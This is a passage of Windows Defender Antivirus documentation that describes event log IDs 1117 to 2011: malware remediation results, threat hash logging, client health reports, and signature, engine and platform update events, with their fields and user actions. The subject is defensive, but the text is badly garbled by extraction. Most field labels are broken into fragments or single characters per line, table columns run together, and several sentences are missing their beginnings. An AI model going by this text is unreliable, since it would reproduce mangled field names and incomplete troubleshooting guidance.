t
e
m
:
s
y
s
t
e
m
i
n
i
t
i
a
t
e
d
R
e
a
l
-
t
i
m
e
:
r
e
a
l
-
t
i
m
e
c
o
m
p
o
n
e
n
t
i
n
i
t
i
a
t
e
d
I
O
A
V
:
I
E
D
o
w
n
l
o
a
d
s
a
n
d
O
u
t
l
o
o
k
E
x
p
r
e
s
s
A
t
t
a
c
h
m
e
n
t
s
i
n
i
t
i
a
t
e
d
N
I
S
:
N
e
t
w
o
r
k
i
n
s
p
e
c
t
i
o
n
s
y
s
t
e
m
I
E
P
R
O
T
E
C
T
:
I
E
-
I
E
x
t
e
n
s
i
o
n
V
a
l
i
d
a
t
i
o
n
;
t
h
i
s
p
r
o
t
e
c
t
s
a
g
a
i
n
s
t
m
a
l
i
c
i
o
u
s
w
e
b
p
a
g
e
c
o
n
t
r
o
l
s
E
a
r
l
y
L
a
u
n
c
h
A
n
t
i
m
a
l
w
a
r
e
(
E
L
A
M
)
.
T
h
i
s
i
n
c
l
u
d
e
s
m
a
l
w
a
r
e
d
e
t
e
c
t
e
d
b
y
t
h
e
b
o
o
t
s
e
q
u
e
n
c
e
R
e
m
o
t
e
a
t
t
e
s
t
a
t
i
o
n
Anti
mal
war
e
Scan
Inte
rfac
e
(AM
SI).
Prim
arily
use
d to
prot
ect
scrip
ts
(PS,
VBS)
,
tho
ugh
it
can
be
invo
ked
by
thir
d
parti
es
as
well.
UAC
User
:
<Do
mai
n>\
<Us
er>
Proc
ess
Na
me:
<Pr
oces
s in
the
PID
>
Sign
atur
e
Vers
ion:
<De
finiti
on
versi
on>
Engi
ne
Vers
ion:
<An
tima
lwar
e
Engi
ne
versi
on>
User action: No action is required. Windows Defender Antivirus can

suspend and take routine action on this threat. If you want to
remove the threat manually, in the Windows Defender
Antivirus interface, click Clean Computer.
EVENT ID: 1117
Symbolic name: MALWAREPROTECTION_STATE_MALWARE_ACTION_TAK

EN
Message: The antimalware platform performed an action to

protect your system from malware or other potentially
unwanted software.
Description: Windows Defender Antivirus has taken action to protect this

machine from malware or other potentially unwanted
software.
Na NOTE: Whenever Windows Defender Antivirus, Microsoft
me: Security Essentials, Malicious Software Removal Tool, or
<Th System Center Endpoint Protection detects a malware, it
reat will restore the following system settings and services
nam which the malware might have changed:
e> Default Internet Explorer or Microsoft Edge setting
ID: User Access Control settings
<Th Chrome settings
reat Boot Control Data
ID>
Regedit and Task Manager registry settings
Seve
rity: Windows Update, Background Intelligent Transfer
<Se Service, and Remote Procedure Call service
verit Windows Operating System files
y>, The above context applies to the following client and
for server versions:
exa
mpl
e:
L
o
w
M
o
d
e
r
a
t
e
H
i
g
h
S
e
v
e
r
e
Cate
gory
:
<Ca
tego
ry
desc
ripti
on>
, for
exa
mpl
e,
any
thre
at
or
mal
war
e
type
.
Path
:
<Fil
e
path
>
Det
ecti
on
Orig
in:
<De
tecti
on
origi
n>,
for
exa
mpl
e:
U
n
k
n
o
w
n
L
o
c
a
l
c
o
m
p
u
t
e
r
N
e
t
w
o
r
k
s
h
a
r
e
I
n
t
e
r
n
e
t
I
n
c
o
m
i
n
g
t
r
a
f
f
i
c
O
u
t
g
o
i
n
g
t
r
a
f
f
i
c
Det
ecti
on
Typ
e:
<De
tecti
on
type
>,
for
exa
mpl
e:
H
e
u
r
i
s
t
i
c
s
G
e
n
e
r
i
c
C
o
n
c
r
e
t
e
D
y
n
a
m
i
c
s
i
g
n
a
t
u
r
e
Det
ecti
on
Sour
ce:
<De
tecti
on
sour
ce>
for
exa
mpl
e:
U
s
e
r
:
u
s
e
r
i
n
i
t
i
a
t
e
d
S
y
s
t
e
m
:
s
y
s
t
e
m
i
n
i
t
i
a
t
e
d
R
e
a
l
-
t
i
m
e
:
r
e
a
l
-
t
i
m
e
c
o
m
p
o
n
e
n
t
i
n
i
t
i
a
t
e
d
I
O
A
V
:
I
E
D
o
w
n
l
o
a
d
s
a
n
d
O
u
t
l
o
o
k
E
x
p
r
e
s
s
A
t
t
a
c
h
m
e
n
t
s
i
n
i
t
i
a
t
e
d
N
I
S
:
N
e
t
w
o
r
k
i
n
s
p
e
c
t
i
o
n
s
y
s
t
e
m
I
E
P
R
O
T
E
C
T
:
I
E
-
I
E
x
t
e
n
s
i
o
n
V
a
l
i
d
a
t
i
o
n
;
t
h
i
s
p
r
o
t
e
c
t
s
a
g
a
i
n
s
t
m
a
l
i
c
i
o
u
s
w
e
b
p
a
g
e
c
o
n
t
r
o
l
s
E
a
r
l
y
L
a
u
n
c
h
A
n
t
i
m
a
l
w
a
r
e
(
E
L
A
M
)
.
T
h
i
s
i
n
c
l
u
d
e
s
m
a
l
w
a
r
e
d
e
t
e
c
t
e
d
b
y
t
h
e
b
o
o
t
s
e
q
u
e
n
c
e
R
e
m
o
t
e
a
t
t
e
s
t
a
t
i
o
n
Anti
mal
war
e
Scan
Inte
rfac
e
(AM
SI).
Prim
arily
use
d to
prot
ect
scrip
ts
(PS,
VBS)
,
tho
ugh
it
can
be
invo
ked
by
thir
d
parti
es
as
well.
UAC
User
:
<Do
mai
n>\
<Us
er>
Proc
ess
Na
me:
<Pr
oces
s in
the
PID
>
Acti
on:
<Ac
tion
>,
for
exa
mpl
e:
C
l
e
a
n
:
T
h
e
r
e
s
o
u
r
c
e
w
a
s
c
l
e
a
n
e
d
Q
u
a
r
a
n
t
i
n
e
:
T
h
e
r
e
s
o
u
r
c
e
w
a
s
q
u
a
r
a
n
t
i
n
e
d
R
e
m
o
v
e
:
T
h
e
r
e
s
o
u
r
c
e
w
a
s
d
e
l
e
t
e
d
A
l
l
o
w
:
T
h
e
r
e
s
o
u
r
c
e
w
a
s
a
l
l
o
w
e
d
t
o
e
x
e
c
u
t
e
/
e
x
i
s
t
U
s
e
r
d
e
f
i
n
e
d
:
U
s
e
r
d
e
f
i
n
e
d
a
c
t
i
o
n
w
h
i
c
h
i
s
n
o
r
m
a
l
l
y
o
n
e
f
r
o
m
t
h
i
s
l
i
s
t
o
f
a
c
t
i
o
n
s
t
h
a
t
t
h
e
u
s
e
r
h
a
s
s
p
e
c
i
f
i
e
d
N
o
a
c
t
i
o
n
:
N
o
a
c
t
i
o
n
B
l
o
c
k
:
T
h
e
r
e
s
o
u
r
c
e
w
a
s
b
l
o
c
k
e
d
f
r
o
m
e
x
e
c
u
t
i
n
g
Acti
on
Stat
us:
<De
scrip
tion
of
addi
tion
al
acti
ons
>
Erro O PERATING SYSTEM O PERATING SYSTEM VERSIO N
r
Cod Client Operating System Windows Vista (Service Pack
e: 1, or Service Pack 2),
<Err Windows 7 and later
or
cod Server Operating System Windows Server 2008,
e> Windows Server 2008 R2,
Res Windows Server 2012, and
ult Windows Server 2016
cod
e
asso
ciate
d
with
thre
at
stat
us.
Stan
dard
HRE
SUL
T
valu
es.
Erro
r
Des
cript
ion:
<Err
or
desc
ripti
on>
Des
cript
ion
of
the
erro
r.
Sign
atur
e
Vers
ion:
<De
finiti
on
versi
on>
Engi
ne
Vers
ion:
<An
tima
lwar
e
Engi
ne
versi
on>
User action: No action is necessary. Windows Defender Antivirus removed

or quarantined a threat.
EVENT ID: 1118
Symbolic name: MALWAREPROTECTION_STATE_MALWARE_ACTION_FAIL

ED
Message: The antimalware platform attempted to perform an

action to protect your system from malware or other
potentially unwanted software, but the action failed.
Description: Windows Defender Antivirus has encountered a non-critical

error when taking action on malware or other potentially
unwanted software.
Na
me:
<Th
reat
nam
e>
ID:
<Th
reat
ID>
Seve
rity:
<Se
verit
y>,
for
exa
mpl
e:
L
o
w
M
o
d
e
r
a
t
e
H
i
g
h
S
e
v
e
r
e
Cate
gory
:
<Ca
tego
ry
desc
ripti
on>
, for
exa
mpl
e,
any
thre
at
or
mal
war
e
type
.
Path
:
<Fil
e
path
>
Det
ecti
on
Orig
in:
<De
tecti
on
origi
n>,
for
exa
mpl
e:
U
n
k
n
o
w
n
L
o
c
a
l
c
o
m
p
u
t
e
r
N
e
t
w
o
r
k
s
h
a
r
e
I
n
t
e
r
n
e
t
I
n
c
o
m
i
n
g
t
r
a
f
f
i
c
O
u
t
g
o
i
n
g
t
r
a
f
f
i
c
Det
ecti
on
Typ
e:
<De
tecti
on
type
>,
for
exa
mpl
e:
H
e
u
r
i
s
t
i
c
s
G
e
n
e
r
i
c
C
o
n
c
r
e
t
e
D
y
n
a
m
i
c
s
i
g
n
a
t
u
r
e
Det
ecti
on
Sour
ce:
<De
tecti
on
sour
ce>
for
exa
mpl
e:
U
s
e
r
:
u
s
e
r
i
n
i
t
i
a
t
e
d
S
y
s
t
e
m
:
s
y
s
t
e
m
i
n
i
t
i
a
t
e
d
R
e
a
l
-
t
i
m
e
:
r
e
a
l
-
t
i
m
e
c
o
m
p
o
n
e
n
t
i
n
i
t
i
a
t
e
d
I
O
A
V
:
I
E
D
o
w
n
l
o
a
d
s
a
n
d
O
u
t
l
o
o
k
E
x
p
r
e
s
s
A
t
t
a
c
h
m
e
n
t
s
i
n
i
t
i
a
t
e
d
N
I
S
:
N
e
t
w
o
r
k
i
n
s
p
e
c
t
i
o
n
s
y
s
t
e
m
I
E
P
R
O
T
E
C
T
:
I
E
-
I
E
x
t
e
n
s
i
o
n
V
a
l
i
d
a
t
i
o
n
;
t
h
i
s
p
r
o
t
e
c
t
s
a
g
a
i
n
s
t
m
a
l
i
c
i
o
u
s
w
e
b
p
a
g
e
c
o
n
t
r
o
l
s
E
a
r
l
y
L
a
u
n
c
h
A
n
t
i
m
a
l
w
a
r
e
(
E
L
A
M
)
.
T
h
i
s
i
n
c
l
u
d
e
s
m
a
l
w
a
r
e
d
e
t
e
c
t
e
d
b
y
t
h
e
b
o
o
t
s
e
q
u
e
n
c
e
R
e
m
o
t
e
a
t
t
e
s
t
a
t
i
o
n
Anti
mal
war
e
Scan
Inte
rfac
e
(AM
SI).
Prim
arily
use
d to
prot
ect
scrip
ts
(PS,
VBS)
,
tho
ugh
it
can
be
invo
ked
by
thir
d
parti
es
as
well.
UAC
User
:
<Do
mai
n>\
<Us
er>
Proc
ess
Na
me:
<Pr
oces
s in
the
PID
>
Acti
on:
<Ac
tion
>,
for
exa
mpl
e:
C
l
e
a
n
:
T
h
e
r
e
s
o
u
r
c
e
w
a
s
c
l
e
a
n
e
d
Q
u
a
r
a
n
t
i
n
e
:
T
h
e
r
e
s
o
u
r
c
e
w
a
s
q
u
a
r
a
n
t
i
n
e
d
R
e
m
o
v
e
:
T
h
e
r
e
s
o
u
r
c
e
w
a
s
d
e
l
e
t
e
d
A
l
l
o
w
:
T
h
e
r
e
s
o
u
r
c
e
w
a
s
a
l
l
o
w
e
d
t
o
e
x
e
c
u
t
e
/
e
x
i
s
t
U
s
e
r
d
e
f
i
n
e
d
:
U
s
e
r
d
e
f
i
n
e
d
a
c
t
i
o
n
w
h
i
c
h
i
s
n
o
r
m
a
l
l
y
o
n
e
f
r
o
m
t
h
i
s
l
i
s
t
o
f
a
c
t
i
o
n
s
t
h
a
t
t
h
e
u
s
e
r
h
a
s
s
p
e
c
i
f
i
e
d
N
o
a
c
t
i
o
n
:
N
o
a
c
t
i
o
n
B
l
o
c
k
:
T
h
e
r
e
s
o
u
r
c
e
w
a
s
b
l
o
c
k
e
d
f
r
o
m
e
x
e
c
u
t
i
n
g
Acti
on
Stat
us:
<De
scrip
tion
of
addi
tion
al
acti
ons
>
Erro
r
Cod
e:
<Err
or
cod
e>
Res
ult
cod
e
asso
ciate
d
with
thre
at
stat
us.
Stan
dard
HRE
SUL
T
valu
es.
Erro
r
Des
cript
ion:
<Err
or
desc
ripti
on>
Des
cript
ion
of
the
erro
r.
Sign
atur
e
Vers
ion:
<De
finiti
on
versi
on>
Engi
ne
Vers
ion:
<An
tima
lwar
e
Engi
ne
versi
on>
User action: No action is necessary. Windows Defender Antivirus failed to

complete a task related to the malware remediation. This is
not a critical failure.
EVENT ID: 1119
Symbolic name: MALWAREPROTECTION_STATE_MALWARE_ACTION_CRIT

ICALLY_FAILED
Message: The antimalware platform encountered a critical error

when trying to take action on malware or other
potentially unwanted software. There are more details
in the event message.
Description: Windows Defender Antivirus has encountered a critical error

when taking action on malware or other potentially
unwanted software.
Na
me:
<Th
reat
nam
e>
ID:
<Th
reat
ID>
Seve
rity:
<Se
verit
y>,
for
exa
mpl
e:
L
o
w
M
o
d
e
r
a
t
e
H
i
g
h
S
e
v
e
r
e
Cate
gory
:
<Ca
tego
ry
desc
ripti
on>
, for
exa
mpl
e,
any
thre
at
or
mal
war
e
type
.
Path
:
<Fil
e
path
>
Det
ecti
on
Orig
in:
<De
tecti
on
origi
n>,
for
exa
mpl
e:
U
n
k
n
o
w
n
L
o
c
a
l
c
o
m
p
u
t
e
r
N
e
t
w
o
r
k
s
h
a
r
e
I
n
t
e
r
n
e
t
I
n
c
o
m
i
n
g
t
r
a
f
f
i
c
O
u
t
g
o
i
n
g
t
r
a
f
f
i
c
Det
ecti
on
Typ
e:
<De
tecti
on
type
>,
for
exa
mpl
e:
H
e
u
r
i
s
t
i
c
s
G
e
n
e
r
i
c
C
o
n
c
r
e
t
e
D
y
n
a
m
i
c
s
i
g
n
a
t
u
r
e
Det
ecti
on
Sour
ce:
<De
tecti
on
sour
ce>
for
exa
mpl
e:
U
s
e
r
:
u
s
e
r
i
n
i
t
i
a
t
e
d
S
y
s
t
e
m
:
s
y
s
t
e
m
i
n
i
t
i
a
t
e
d
R
e
a
l
-
t
i
m
e
:
r
e
a
l
-
t
i
m
e
c
o
m
p
o
n
e
n
t
i
n
i
t
i
a
t
e
d
I
O
A
V
:
I
E
D
o
w
n
l
o
a
d
s
a
n
d
O
u
t
l
o
o
k
E
x
p
r
e
s
s
A
t
t
a
c
h
m
e
n
t
s
i
n
i
t
i
a
t
e
d
N
I
S
:
N
e
t
w
o
r
k
i
n
s
p
e
c
t
i
o
n
s
y
s
t
e
m
I
E
P
R
O
T
E
C
T
:
I
E
-
I
E
x
t
e
n
s
i
o
n
V
a
l
i
d
a
t
i
o
n
;
t
h
i
s
p
r
o
t
e
c
t
s
a
g
a
i
n
s
t
m
a
l
i
c
i
o
u
s
w
e
b
p
a
g
e
c
o
n
t
r
o
l
s
E
a
r
l
y
L
a
u
n
c
h
A
n
t
i
m
a
l
w
a
r
e
(
E
L
A
M
)
.
T
h
i
s
i
n
c
l
u
d
e
s
m
a
l
w
a
r
e
d
e
t
e
c
t
e
d
b
y
t
h
e
b
o
o
t
s
e
q
u
e
n
c
e
R
e
m
o
t
e
a
t
t
e
s
t
a
t
i
o
n
Anti
mal
war
e
Scan
Inte
rfac
e
(AM
SI).
Prim
arily
use
d to
prot
ect
scrip
ts
(PS,
VBS)
,
tho
ugh
it
can
be
invo
ked
by
thir
d
parti
es
as
well.
UAC
User
:
<Do
mai
n>\
<Us
er>
Proc
ess
Na
me:
<Pr
oces
s in
the
PID
>
Acti
on:
<Ac
tion
>,
for
exa
mpl
e:
C
l
e
a
n
:
T
h
e
r
e
s
o
u
r
c
e
w
a
s
c
l
e
a
n
e
d
Q
u
a
r
a
n
t
i
n
e
:
T
h
e
r
e
s
o
u
r
c
e
w
a
s
q
u
a
r
a
n
t
i
n
e
d
R
e
m
o
v
e
:
T
h
e
r
e
s
o
u
r
c
e
w
a
s
d
e
l
e
t
e
d
A
l
l
o
w
:
T
h
e
r
e
s
o
u
r
c
e
w
a
s
a
l
l
o
w
e
d
t
o
e
x
e
c
u
t
e
/
e
x
i
s
t
U
s
e
r
d
e
f
i
n
e
d
:
U
s
e
r
d
e
f
i
n
e
d
a
c
t
i
o
n
w
h
i
c
h
i
s
n
o
r
m
a
l
l
y
o
n
e
f
r
o
m
t
h
i
s
l
i
s
t
o
f
a
c
t
i
o
n
s
t
h
a
t
t
h
e
u
s
e
r
h
a
s
s
p
e
c
i
f
i
e
d
N
o
a
c
t
i
o
n
:
N
o
a
c
t
i
o
n
B
l
o
c
k
:
T
h
e
r
e
s
o
u
r
c
e
w
a
s
b
l
o
c
k
e
d
f
r
o
m
e
x
e
c
u
t
i
n
g
Acti
on
Stat
us:
<De
scrip
tion
of
addi
tion
al
acti
ons
>
Erro
r
Cod
e:
<Err
or
cod
e>
Res
ult
cod
e
asso
ciate
d
with
thre
at
stat
us.
Stan
dard
HRE
SUL
T
valu
es.
Erro
r
Des
cript
ion:
<Err
or
desc
ripti
on>
Des
cript
ion
of
the
erro
r.
Sign
atur
e
Vers
ion:
<De
finiti
on
versi
on>
Engi
ne
Vers
ion:
<An
tima
lwar
e
Engi
ne
versi
on>
User action: The Windows Defender Antivirus client encountered this error
due to critical issues. The endpoint might not be protected.
Review the error description then follow the relevant User
action steps below.
ACTIO N USER ACTIO N
Remove Update the definitions then

verify that the removal was
successful.
Clean Update the definitions then

verify that the remediation
was successful.
Quarantine Update the definitions and

verify that the user has
permission to access the
necessary resources.
Allow Verify that the user has

permission to access the
necessary resources.
If this event persists:

for the error code.
EVENT ID: 1120
Symbolic name: MALWAREPROTECTION_THREAT_HASH
Message: Windows Defender Antivirus has deduced the hashes for

a threat resource.
Description: Windows Defender Antivirus client is up and running in a
healthy state.
Curr
ent
Platf
orm
Vers
ion:
<Cu
rren
t
platf
orm
versi
on>
Thre
at
Res
ourc
e
Path
:
<Pa
th>
Has
hes:
<Ha
shes
>
Note This event will only be logged if the following policy is

set: ThreatFileHashLogging unsigned.
EVENT ID: 1150
Symbolic name: MALWAREPROTECTION_SERVICE_HEALTHY
Message: If your antimalware platform reports status to a

monitoring platform, this event indicates that the
antimalware platform is running and in a healthy state.
Description: Windows Defender Antivirus client is up and running in a
healthy state.
Platf
orm
Vers
ion:
<Cu
rren
t
platf
orm
versi
on>
Sign
atur
e
Vers
ion:
<De
finiti
on
versi
on>
Engi
ne
Vers
ion:
<An
tima
lwar
e
Engi
ne
versi
on>
User action: No action is necessary. The Windows Defender Antivirus

client is in a healthy state. This event is reported on an hourly
basis.
EVENT ID: 1151
Symbolic name: MALWAREPROTECTION_SERVICE_HEALTH_REPORT
Message: Endpoint Protection client health report (time in UTC)
Description: Antivirus client health report.

Platf
orm
Vers
ion:
<Cu
rren
t
platf
orm
versi
on>
Engi
ne
Vers
ion:
<An
tima
lwar
e
Engi
ne
versi
on>
Net
wor
k
Real
time
Insp
ecti
on
engi
ne
versi
on:
<Ne
twor
k
Real
time
Insp
ecti
on
engi
ne
versi
on>
Anti
viru
s
sign
atur
e
versi
on:
<An
tivir
us
sign
atur
e
versi
on>
Anti
spy
war
e
sign
atur
e
versi
on:
<An
tisp
ywa
re
sign
atur
e
versi
on>
Net
wor
k
Real
time
Insp
ecti
on
sign
atur
e
versi
on:
<Ne
twor
k
Real
time
Insp
ecti
on
sign
atur
e
versi
on>
RTP
stat
e:
<Re
alti
me
prot
ecti
on
stat
e>
(Ena
bled
or
Disa
bled
)
OA
stat
e:
<O
n
Acce
ss
stat
e>
(Ena
bled
or
Disa
bled
)
IOA
V
stat
e:
<IE
Dow
nloa
ds
and
Outl
ook
Expr
ess
Atta
chm
ents
stat
e>
(Ena
bled
or
Disa
bled
)
BM
stat
e:
<Be
havi
or
Mo
nito
ring
stat
e>
(Ena
bled
or
Disa
bled
)
Anti
viru
s
sign
atur
e
age:
<An
tivir
us
sign
atur
e
age
>
(in
days
)
Anti
spy
war
e
sign
atur
e
age:
<An
tisp
ywa
re
sign
atur
e
age
>
(in
days
)
Last
quic
k
scan
age:
<La
st
quic
k
scan
age
>
(in
days
)
Last
full
scan
age:
<La
st
full
scan
age
>
(in
days
)
Anti
viru
s
sign
atur
e
crea
tion
time
:?
<An
tivir
us
sign
atur
e
crea
tion
time
>
Anti
spy
war
e
sign
atur
e
crea
tion
time
:?
<An
tisp
ywa
re
sign
atur
e
crea
tion
time
>
Last
quic
k
scan
start
time
:?
<La
st
quic
k
scan
start
time
>
Last
quic
k
scan
end
time
:?
<La
st
quic
k
scan
end
time
>
Last
quic
k
scan
sour
ce:
<La
st
quic
k
scan
sour
ce>
(0 =
scan
didn
't
run,
1=
user
initi
ated
,2
=
syst
em
initi
ated
)
Last
full
scan
start
time
:?
<La
st
full
scan
start
time
>
Last
full
scan
end
time
:?
<La
st
full
scan
end
time
>
Last
full
scan
sour
ce:
<La
st
full
scan
sour
ce>
(0 =
scan
didn
't
run,
1=
user
initi
ated
,2
=
syst
em
initi
ated
)
Pro
duct
stat
us:
For
inter
nal
trou
bles
hoo
ting
EVENT ID: 2000
Symbolic name: MALWAREPROTECTION_SIGNATURE_UPDATED
Message: The antimalware definitions updated successfully.
Description: Antivirus signature version has been updated.

Curr
ent
Sign
atur
e
Vers
ion:
<Cu
rren
t
sign
atur
e
versi
on>
Prev
ious
Sign
atur
e
Vers
ion:
<Pr
evio
us
sign
atur
e
versi
on>
Sign
atur
e
Typ
e:
<Sig
natu
re
type
>,
for
exa
mpl
e:
A
n
t
i
v
i
r
u
s
A
n
t
i
s
p
y
w
a
r
e
A
n
t
i
m
a
l
w
a
r
e
N
e
t
w
o
r
k
I
n
s
p
e
c
t
i
o
n
S
y
s
t
e
m
Upd
ate
Typ
e:
<Up
date
type
>,
eith
er
Full
or
Delt
a.
User
:
<Do
mai
n>\
<Us
er>
Curr
ent
Engi
ne
Vers
ion:
<Cu
rren
t
engi
ne
versi
on>
Prev
ious
Engi
ne
Vers
ion:
<Pr
evio
us
engi
ne
versi
on>

client is in a healthy state. This event is reported when
signatures are successfully updated.
EVENT ID: 2001
Symbolic name: MALWAREPROTECTION_SIGNATURE_UPDATE_FAILED
Message: The antimalware definition update failed.

to update signatures.
New
Sign
atur
e
Vers
ion:
<Ne
w
versi
on
num
ber
>
Prev
ious
Sign
atur
e
Vers
ion:
<Pr
evio
us
sign
atur
e
versi
on>
Upd
ate
Sour
ce:
<Up
date
sour
ce>,
for
exa
mpl
e:
S
i
g
n
a
t
u
r
e
u
p
d
a
t
e
f
o
l
d
e
r
I
n
t
e
r
n
a
l
d
e
f
i
n
i
t
i
o
n
u
p
d
a
t
e
s
e
r
v
e
r
M
i
c
r
o
s
o
f
t
U
p
d
a
t
e
S
e
r
v
e
r
F
i
l
e
s
h
a
r
e
M
i
c
r
o
s
o
f
t
M
a
l
w
a
r
e
P
r
o
t
e
c
t
i
o
n
C
e
n
t
e
r
(
M
M
P
C
)
Upd
ate
Stag
e:
<Up
date
stag
e>,
for
exa
mpl
e:
S
e
a
r
c
h
D
o
w
n
l
o
a
d
I
n
s
t
a
l
l
Sour
ce
Path
: File
shar
e
nam
e for
Univ
ersal
Na
min
g
Con
vent
ion
(UN
C),
serv
er
nam
e for
Win
dow
s
Serv
er
Upd
ate
Serv
ices
(WS
US)/
Micr
osof
t
Upd
ate/
ADL
.
Sign
atur
e
Typ
e:
<Sig
natu
re
type
>,
for
exa
mpl
e:
A
n
t
i
v
i
r
u
s
A
n
t
i
s
p
y
w
a
r
e
A
n
t
i
m
a
l
w
a
r
e
N
e
t
w
o
r
k
I
n
s
p
e
c
t
i
o
n
S
y
s
t
e
m
Upd
ate
Typ
e:
<Up
date
type
>,
eith
er
Full
or
Delt
a.
User
:
<Do
mai
n>\
<Us
er>
Curr
ent
Engi
ne
Vers
ion:
<Cu
rren
t
engi
ne
versi
on>
Prev
ious
Engi
ne
Vers
ion:
<Pr
evio
us
engi
ne
versi
on>
Erro
r
Cod
e:
<Err
or
cod
e>
Res
ult
cod
e
asso
ciate
d
with
thre
at
stat
us.
Stan
dard
HRE
SUL
T
valu
es.
Erro
r
Des
cript
ion:
<Err
or
desc
ripti
on>
Des
cript
ion
of
the
erro
r.
User action: This error occurs when there is a problem updating

definitions. To troubleshoot this event:
1. Update definitions and force a rescan directly on the
endpoint.
2. Review the entries in the
%Windir%\WindowsUpdate.log file for more
information about this error.
EVENT ID: 2002
Symbolic name: MALWAREPROTECTION_ENGINE_UPDATED
Message: The antimalware engine updated successfully.

Description: Windows Defender Antivirus engine version has been
updated.
Curr
ent
Engi
ne
Vers
ion:
<Cu
rren
t
engi
ne
versi
on>
Prev
ious
Engi
ne
Vers
ion:
<Pr
evio
us
engi
ne
versi
on>
Engi
ne
Typ
e:
<En
gine
type
>,
eith
er
anti
mal
war
e
engi
ne
or
Net
wor
k
Insp
ecti
on
Syst
em
engi
ne.
User
:
<Do
mai
n>\
<Us
er>
client is in a healthy state. This event is reported when the
antimalware engine is successfully updated.
EVENT ID: 2003
Symbolic name: MALWAREPROTECTION_ENGINE_UPDATE_FAILED
Message: The antimalware engine update failed.

to update the engine.
New
Engi
ne
Vers
ion:
Prev
ious
Engi
ne
Vers
ion:
<Pr
evio
us
engi
ne
versi
on>
Engi
ne
Typ
e:
<En
gine
type
>,
eith
er
anti
mal
war
e
engi
ne
or
Net
wor
k
Insp
ecti
on
Syst
em
engi
ne.
User
:
<Do
mai
n>\
<Us
er>
Erro
r
Cod
e:
<Err
or
cod
e>
Res
ult
cod
e
asso
ciate
d
with
thre
at
stat
us.
Stan
dard
HRE
SUL
T
valu
es.
Erro
r
Des
cript
ion:
<Err
or
desc
ripti
on>
Des
cript
ion
of
the
erro
r.
User action: The Windows Defender Antivirus client update failed. This
event occurs when the client fails to update itself. This event
is usually due to an interruption in network connectivity
during an update. To troubleshoot this event:
1. Update definitions and force a rescan directly on the
endpoint.
EVENT ID: 2004
Symbolic name: MALWAREPROTECTION_SIGNATURE_REVERSION

Message: There was a problem loading antimalware definitions.
The antimalware engine will attempt to load the last-
known good set of definitions.

to load signatures and will attempt reverting back to a
known-good set of signatures.
Sign
atur
es
Atte
mpt
ed:
Erro
r
Cod
e:
<Err
or
cod
e>
Res
ult
cod
e
asso
ciate
d
with
thre
at
stat
us.
Stan
dard
HRE
SUL
T
valu
es.
Erro
r
Des
cript
ion:
<Err
or
desc
ripti
on>
Des
cript
ion
of
the
erro
r.
Sign
atur
e
Vers
ion:
<De
finiti
on
versi
on>
Engi
ne
Vers
ion:
<An
tima
lwar
e
engi
ne
versi
on>
User action: The Windows Defender Antivirus client attempted to

download and install the latest definitions file and failed. This
error can occur when the client encounters an error while
trying to load the definitions, or if the file is corrupt. Windows
Defender Antivirus will attempt to revert back to a known-
good set of definitions. To troubleshoot this event:
1. Restart the computer and try again.
2. Download the latest definitions from the Windows
Defender Security Intelligence site. Note: The size of
the definitions file downloaded from the site can
exceed 60 MB and should not be used as a long-term
solution for updating definitions.
EVENT ID: 2005
Symbolic name: MALWAREPROTECTION_ENGINE_UPDATE_PLATFORMOU

TOFDATE
Message: The antimalware engine failed to load because the

antimalware platform is out of date. The antimalware
platform will load the last-known good antimalware
engine and attempt to update.
Description: Windows Defender Antivirus could not load antimalware

engine because current platform version is not supported.
Windows Defender Antivirus will revert back to the last
known-good engine and a platform update will be
attempted.
Curr
ent
Platf
orm
Vers
ion:
<Cu
rren
t
platf
orm
versi
on>
EVENT ID: 2006
Symbolic name: MALWAREPROTECTION_PLATFORM_UPDATE_FAILED
Message: The platform update failed.

to update the platform.
Curr
ent
Platf
orm
Vers
ion:
<Cu
rren
t
platf
orm
versi
on>
Erro
r
Cod
e:
<Err
or
cod
e>
Res
ult
cod
e
asso
ciate
d
with
thre
at
stat
us.
Stan
dard
HRE
SUL
T
valu
es.
Erro
r
Des
cript
ion:
<Err
or
desc
ripti
on>
Des
cript
ion
of
the
erro
r.
EVENT ID: 2007

Symbolic name: MALWAREPROTECTION_PLATFORM_ALMOSTOUTOFDAT
E
Message: The platform will soon be out of date. Download the

latest platform to maintain up-to-date protection.
Description: Windows Defender Antivirus will soon require a newer

platform version to support future versions of the
antimalware engine. Download the latest Windows Defender
Antivirus platform to maintain the best level of protection
available.
Curr
ent
Platf
orm
Vers
ion:
<Cu
rren
t
platf
orm
versi
on>
EVENT ID: 2010
Symbolic name: MALWAREPROTECTION_SIGNATURE_FASTPATH_UPDATE

D
Message: The antimalware engine used the Dynamic Signature

Service to get additional definitions.
Description: Windows Defender Antivirus used Dynamic Signature Service

to retrieve additional signatures to help protect your
machine.
Curr
ent
Sign
atur
e
Vers
ion:
<Cu
rren
t
sign
atur
e
versi
on>
Sign
atur
e
Typ
e:
<Sig
natu
re
type
>,
for
exa
mpl
e:
A
n
t
i
v
i
r
u
s
A
n
t
i
s
p
y
w
a
r
e
A
n
t
i
m
a
l
w
a
r
e
N
e
t
w
o
r
k
I
n
s
p
e
c
t
i
o
n
S
y
s
t
e
m
Curr
ent
Engi
ne
Vers
ion:
<Cu
rren
t
engi
ne
versi
on>
Dyn
amic
Sign
atur
e
Typ
e:
<Dy
nam
ic
sign
atur
e
type
>,
for
exa
mpl
e:
V
e
r
s
i
o
n
T
i
m
e
s
t
a
m
p
N
o
l
i
m
i
t
D
u
r
a
t
i
o
n
Pers
iste
nce
Path
:
<Pa
th>
Dyn
amic
Sign
atur
e
Vers
ion:
<Ve
rsio
n
num
ber
>
Dyn
amic
Sign
atur
e
Co
mpil
atio
n
Tim
esta
mp:
<Ti
mes
tam
p>
Pers
iste
nce
Limi
t
Typ
e:
<Pe
rsist
ence
limit
type
>,
for
exa
mpl
e:
V
D
M
v
e
r
s
i
o
n
T
i
m
e
s
t
a
m
p
N
o
l
i
m
i
t
Pers
iste
nce
Limi
t:
Pers
iste
nce
limit
of
the
fast
path
sign
atur
e.
EVENT ID: 2011
Symbolic name: MALWAREPROTECTION_SIGNATURE_FASTPATH_DELETE

D
Message: The Dynamic Signature Service deleted the out-of-date

dynamic definitions.
Description: Windows Defender Antivirus used Dynamic Signature Service

to discard obsolete signatures.
Curr
ent
Sign
atur
e
Vers
ion:
<Cu
rren
t
sign
atur
e
versi
on>
Sign
atur
e
Typ
e:
<Sig
natu
re
type
>,
for
exa
mpl
e:
A
n
t
i
v
i
r
u
s
A
n
t
i
s
p
y
w
a
r
e
A
n
t
i
m
a
l
w
a
r
e
N
e
t
w
o
r
k
I
n
s
p
e
c
t
i
o
n
S
y
s
t
e
m
Curr
ent
Engi
ne
